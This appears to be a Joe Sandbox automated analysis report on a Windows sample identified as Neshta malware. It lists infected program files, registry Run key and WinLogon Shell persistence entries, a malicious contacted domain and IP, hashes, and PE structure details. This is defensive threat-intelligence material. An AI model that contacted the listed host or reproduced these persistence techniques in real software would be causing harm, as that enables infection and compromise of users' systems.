C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	100%	ReversingLabs	Win32.Virus.Neshta

Name	IP	Active	Malicious	Antivirus Detection	Reputation
519600cl.nyashtop.top	37.44.238.250	true	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://519600cl.nyashtop.top/authDatalifeCdnTemporary.php	true

URLs from Memory and Binaries

Name	Source	Malicious
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000039.00000003.2223535604.000001F848872000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 00000039.00000003.2223535604.000001F8488C2000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith	msedge_pwa_launcher.exe.0.dr	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000023.00000002.2406346739.0000023FC8DD6000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000039.00000003.2223535604.000001F8488C2000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.2380149744.000002188D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C3BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABC58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC671F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D826000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C9130C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B54D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9D086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687587000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788E066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC91AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8E20000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000023.00000002.2406346739.0000023FC8DD6000.00000004.00000800.00020000.00000000.sdmp	false
https://ion=v4.5	powershell.exe, 00000014.00000002.2496719143.00000215B51E5000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.2380149744.000002188D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C3BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABC58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC671F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D826000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C9130C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B54D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9D086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687587000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788E066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC91AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8E20000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000039.00000003.2223535604.000001F8488A3000.00000004.00000800.00020000.00000000.sdmp	false
http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte	integrator.exe.0.dr	false
https://aka.ms/pscore68	powershell.exe, 00000006.00000002.2380149744.000002188CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C39B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC66FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C91011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9CE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788DE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC8E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8BB1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SearchIndexer.exe, 00000001.00000002.1913109715.0000000003888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2380149744.000002188CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C39B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC66FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C91011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9CE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788DE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC8E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8BB1000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000039.00000003.2223535604.000001F8488C2000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000023.00000002.2406346739.0000023FC8DD6000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff	msedge_pwa_launcher.exe.0.dr	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.250	519600cl.nyashtop.top	France		49434	HARMONYHOSTING-ASFR	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589995
Start date and time:	2025-01-13 13:09:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	73
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SearchIndexer.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@102/312@1/2
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RuntimeBroker.exe, PID 9180 because it is empty
Execution Graph export aborted for target SearchIndexer.exe, PID 4820 because it is empty
Execution Graph export aborted for target SearchIndexer.exe, PID 6636 because there are no executed function
Execution Graph export aborted for target tAVtSoJGTaCxrZiXcJn.exe, PID 2252 because it is empty
Execution Graph export aborted for target tAVtSoJGTaCxrZiXcJn.exe, PID 8740 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:10:18	API Interceptor	616x Sleep call for process: powershell.exe modified
07:10:50	API Interceptor	701077x Sleep call for process: tAVtSoJGTaCxrZiXcJn.exe modified
07:10:53	API Interceptor	2x Sleep call for process: svchost.exe modified
12:10:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn "C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe"
12:10:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe"
12:10:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SearchIndexer "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe"
12:10:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn "C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe"
12:11:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe"
12:11:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SearchIndexer "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe"
12:11:23	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn "C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe"
12:11:35	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe"
12:11:46	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SearchIndexer "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe"
12:12:03	Autostart	Run: WinLogon Shell "C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe"
12:12:12	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe"
12:12:20	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe"
12:12:29	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe"
12:12:38	Autostart	Run: WinLogon Shell "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe"

Process:	C:\Users\user\Desktop\SearchIndexer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	275560
Entropy (8bit):	6.2970746701197715
Encrypted:	false
SSDEEP:	3072:sr85CqP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvOIXM:k9q4VQjVsxyItKQNhigibKCM
MD5:	C5611345B2807155BF89ECA90379AB14
SHA1:	03A0F7BD2A50895DF6A9311DB3E5C58B574E1BA3
SHA-256:	6AB1464D7BA02FA63FDDFAF5295237352F14F7AF63E443E55D3FFB68A304C304
SHA-512:	18C164973DE987AD9ED1CFCB2AE5557238692B5C50E0F8B8DCECF0B11B2DADBA6C0B5990C532AE8DB578F04BD1CAB3086C78493866C8B989A41DD6251693CA98
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Joe Security Rule: MALWARE_Win_Neshta, Description: Detects Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................t......................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................\|...................idata..d....P.......\|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x07b5db73, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42211989090208135
Encrypted:	false
SSDEEP:	1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
MD5:	23B58690472DBCC3E3A6B5FC20E2730D
SHA1:	EF96992C7E4ECB74198F3AB70F8EA74BCA2F8A0F
SHA-256:	AB1E58291241A13C26C50753E0FD307B327ACAF11A1ECBDB2575FAC0CDE7B194
SHA-512:	C291E61F62D3B136B7450A3B49275C07CCE1B5264165273F425A12D71838EA468AF4FD6CC96E381E8358FF74A5632E67A42A6E6795205CBC38F9AA981C535BBA
Malicious:	false
Reputation:	unknown
Preview:	...s... .......A.......X\...;...{......................0.!..........{A.6....}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................N..-6....}..................;.H6....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.005753878328145
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
MD5:	81D32E8AE893770C4DEA5135D1D8E78D
SHA1:	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
SHA-256:	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
SHA-512:	FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Mon Jan 13 13:25:47 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1956
Entropy (8bit):	4.556411677655966
Encrypted:	false
SSDEEP:	24:HUO9/OCHItDfH1wKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:kCox2KhmMluOulajfqXSfbNtmh1Z
MD5:	EEF3D10DAC685D65CF95BA02ECF00BED
SHA1:	AF58818C1DA9DE30FFDE8CE5C48667C43BA8E85D
SHA-256:	18ED7987A965B8EA1460229E7D925DF191BDE592036BD85E5C794C624AB524E0
SHA-512:	A17A034E55EDCE3B1414CFDE26FE3D78CC07581D977F016C7D56AC488C5216317A2EB0342F531D952C5B504A0F5E99B4985A2AB7F3366598EE65986FEAEB55C1
Malicious:	false
Reputation:	unknown
Preview:	L...[..g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...\|...............@..@........=....c:\Windows\System32\CSC8B0546412F3A4425A5D7AA169F4D63A4.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESF5B1.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.820148898590504
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXAQvd7SbVpSLEKvpBVX0XXKvj:Vx993DEUpGSxpSYnX8
MD5:	8301A0B56CC402944FDAF9CE2CBE2326
SHA1:	DCA58918831C6B94D6262355DE2709EE462D7427
SHA-256:	02D77A00403D4D766C6F20721CF65689FF44AEAAAA304CE6E5F27742FA8CE537
SHA-512:	B44434C9043DF624DCEB3FC4142CFF51553AD9C1EA4EF9BD2DC4D3EECDFD87194ABAB1721807D069F4C7E32D490D8C65774A1D57166E81468C4AD17FF20C532B
Malicious:	false
Reputation:	unknown
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:25:57..08:25:57, error: 0x80072746.08:26:02, error: 0x80072746.

Entrypoint:	0x4080e4
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9f4693fc0c511135129493f2161d1e86

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15000	0x864	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x1400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x17000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x722c	0x7400	ca3464d4f08c9010e7ffa2fe3e890344	False	0.6173558728448276	data	6.511672174892103	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9000	0x218	0x400	7ffc3168a7f3103634abdf3a768ed128	False	0.3623046875	data	3.1516983405583385	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xa000	0xa899	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x15000	0x864	0xa00	6e7a45521bfca94f1e506361f70e7261	False	0.37421875	data	4.173859768945439	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x16000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x17000	0x18	0x200	7e6c0f4f4435abc870eb550d5072bad6	False	0.05078125	data	0.2069200177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x18000	0x5cc	0x600	16968c66d220638496d6b095f21de777	False	0.8483072916666666	data	6.443093465893509	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
